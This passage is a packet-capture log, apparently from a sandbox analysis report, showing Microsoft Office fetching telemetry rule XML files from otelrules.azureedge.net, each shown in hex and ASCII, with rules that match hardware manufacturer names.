T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49784	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:14 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:14 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:14 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 229463e4-b01e-0021-2a03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185314Z-r1cf579d778qlpkrhC1EWRpfc800000006s00000000092wz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:14 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:14 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:14 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:14 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: ebc14d87-b01e-0070-664c-491cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185314Z-r1cf579d778x776bhC1EWRdk800000000670000000002ar9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:14 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:14 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:14 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:14 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 987987f9-101e-0034-0e02-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185314Z-r1cf579d7788pwqzhC1EWRrpd800000006e0000000004515 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:14 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49788	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:14 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:14 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:14 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: e9e1dff1-101e-0065-7303-484088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185314Z-r1cf579d778xq4f9hC1EWRx41g00000005xg000000008g7q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:14 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49789	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:16 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:16 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 7b99b195-101e-0017-7009-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185316Z-r1cf579d7786c2tshC1EWRr1gc00000005vg000000001rwm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:16 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:16 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:16 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 90a12f2a-001e-0079-1603-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185316Z-r1cf579d778w59f9hC1EWRze6w00000006g0000000000u64 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:16 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:16 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:16 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 90f2e2a0-001e-0014-5807-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185316Z-r1cf579d778z4wflhC1EWRa3h0000000069g000000000zxt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:16 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:16 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:16 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 09188c3a-a01e-0021-2702-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185316Z-r1cf579d778dndrdhC1EWR4b2400000005sg000000006rdp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:16 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:16 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:16 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 75599bc5-d01e-008e-7c03-48387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185316Z-r1cf579d778xq4f9hC1EWRx41g00000005yg000000006sw7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:16 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:18 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:18 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 48f2d82f-b01e-0084-1302-48d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185318Z-r1cf579d778xr2r4hC1EWRqvfs000000062g000000008sc5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:18 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49795	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:18 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:18 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:18 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 1e88822f-901e-0029-0201-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185318Z-r1cf579d778v97q7hC1EWRf95c00000005r00000000076h9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:18 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:18 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:18 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 22946cbe-b01e-0021-6403-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185318Z-r1cf579d778z4wflhC1EWRa3h0000000066g000000004yc5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:19 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 